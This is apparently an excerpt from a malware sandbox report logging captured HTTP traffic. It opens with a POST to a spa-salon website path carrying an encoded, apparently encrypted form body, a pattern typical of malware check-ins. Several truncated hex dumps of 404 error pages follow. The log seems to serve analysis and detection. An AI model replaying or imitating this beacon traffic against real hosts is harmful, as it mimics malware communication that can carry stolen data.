              Source: unknownHTTP traffic detected: POST /3g97/ HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 202Cache-Control: max-age=0Origin: http://www.a-two-spa-salon.comReferer: http://www.a-two-spa-salon.com/3g97/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 31 32 6c 34 32 3d 34 36 6a 39 69 4f 35 61 67 71 4d 35 72 4d 78 46 39 53 47 65 4f 74 31 68 4e 66 42 67 4f 2b 75 6d 48 71 34 64 4c 4a 67 6b 4b 52 42 31 65 38 64 2f 50 6e 43 4f 58 73 31 2b 51 34 69 74 33 74 6a 61 6a 77 61 5a 53 50 70 6e 66 63 32 32 5a 7a 4f 50 45 42 62 51 61 6c 62 58 67 50 6a 71 6e 69 6e 54 2f 55 34 34 59 57 39 72 57 6d 58 4a 55 77 39 55 79 77 30 5a 56 2b 54 44 6e 41 4f 36 64 68 46 57 2f 49 72 62 47 71 72 62 46 4c 47 73 4e 37 39 57 34 46 55 35 2f 7a 66 6e 66 41 30 56 75 67 74 70 52 70 49 64 46 53 55 41 66 36 70 74 45 38 77 4c 49 37 46 2f 78 77 2f 59 53 64 4a 7a 45 56 4d 62 4f 67 3d 3d Data Ascii: 12l42=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpRpIdFSUAf6ptE8wLI7F/xw/YSdJzEVMbOg==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:26:07 GMTContent-Type: text/htmlContent-Length: 1409Connection: closeVary: Accept-EncodingETag: "629dd94c-581"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:26:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:26:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:26:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Wed, 24 Apr 2024 05:26:46 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 7
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Wed, 24 Apr 2024 05:26:49 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 7
